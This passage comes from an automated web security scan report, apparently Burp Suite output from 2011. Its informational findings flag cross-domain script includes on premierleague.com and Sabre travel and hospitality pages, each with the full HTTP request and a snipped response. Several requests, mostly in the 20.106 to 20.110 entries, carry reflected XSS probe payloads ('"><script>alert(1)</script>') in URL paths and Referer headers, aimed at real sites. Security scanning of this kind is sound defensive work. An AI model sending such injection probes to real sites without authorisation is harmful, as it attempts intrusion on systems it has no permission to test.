<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Rendered: perslows04 at 03 10 2011 00:28:37 BST -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ut
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=G07611"></script>
...[SNIP]...

20.99. http://www.premierleague.com/page/SearchResults/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /page/SearchResults/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date HTTP/1.1
Host: www.premierleague.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Players/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tabPreferences15685=0; tabPreferences4361=0; tabPreferences4381=0; tabPreferences4401=0; __utma=233090271.104762655.1317599330.1317599330.1317599330.1; __utmb=233090271.3.10.1317599330; __utmc=233090271; __utmz=233090271.1317599330.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tabPreferences5102=0; s_cc=true; rsi_segs=; s_sq=premiumtvpremierleague%3D%2526pid%253D/Players%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520document.getElementById%252528%252527categorySearchForm%252527%252529.submit%252528%252529%25257D%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=utf-8
Expires: Sun, 02 Oct 2011 23:53:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:53:13 GMT
Content-Length: 60029
Connection: close
Vary: Accept-Encoding


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Rendered: perslows03 at 03 10 2011 00:53:13 BST -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ut
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=G07611"></script>
...[SNIP]...

20.100. http://www.sabrehospitality.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?esiteurl=sabrehospitalitysolutions.com HTTP/1.1
Host: www.sabrehospitality.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabre.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:44 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17374


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <!-- cmt id="meta
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...

20.101. http://www.sabrehospitality.com/hotel-distribution-systems.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /hotel-distribution-systems.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hotel-distribution-systems.php HTTP/1.1
Host: www.sabrehospitality.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7578a4s2f2v2eeuc05nnpk0f35; __utma=1.152168344.1317600463.1317600463.1317600463.1; __utmb=1.1.10.1317600463; __utmc=1; __utmz=1.1317600463.1.1.utmcsr=sabre.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:56 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14629


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...

20.102. http://www.sabretravelnetwork.com/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/map.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; exp_last_activity=1317618439; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618472; expires=Tue, 02-Oct-2012 00:07:52 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:52 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19005


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...

20.103. http://www.sabretravelnetwork.com/home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q=sabre+travel
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618417; expires=Tue, 02-Oct-2012 00:06:57 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:06:57 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19120


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...

20.104. http://www.sabretravelnetwork.com/home/products_services/product_index/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/product_index/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/products_services/product_index/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/cse?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0&ad=n9&num=10&rurl=http%3A%2F%2Fwww.sabretravelnetwork.com%2Fhome%2Fsearch%2Fshow_results%3Fcx%3D000492012218074769583%253Az9egyc6spxy%26cof%3DFORID%253A10%26ie%3DUTF-8%26q%3Dtravel%2Bbooking%2Bhotel%26sa.x%3D0%26sa.y%3D0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.3.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621521; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621525; expires=Tue, 02-Oct-2012 00:58:45 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fsearch86891abb159fbf953a%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A39%3A%22%2Fsearch39ea0abec86970faa3%2Fshow_results%2F%22%3Bi%3A3%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:48 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 130256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...

20.105. http://www.sabretravelnetwork.com/home/products_services/product_index/images/loadingAnimation.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/product_index/images/loadingAnimation.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/products_services/product_index/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home/products_services/product_index/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621522; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.4.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621531; expires=Tue, 02-Oct-2012 00:58:52 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:56 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 130433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...

20.106. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/products_services/travel_agency/contracts/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621580; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621621; expires=Tue, 02-Oct-2012 01:00:21 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:00:24 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21564


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...

20.107. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/images/loadingAnimation.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/products_services/travel_agency/contracts/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621619; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.7.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621625; expires=Tue, 02-Oct-2012 01:00:25 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:00:26 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...

20.108. http://www.sabretravelnetwork.com/home/search/show_results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/search/show_results

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621489; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621500; expires=Tue, 02-Oct-2012 00:58:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:21 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script>
...[SNIP]...

20.109. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621490; expires=Tue, 02-Oct-2012 00:58:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:10 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13303


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</form>


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...

20.110. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621580; expires=Tue, 02-Oct-2012 00:59:40 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:41 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13768


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
</form>
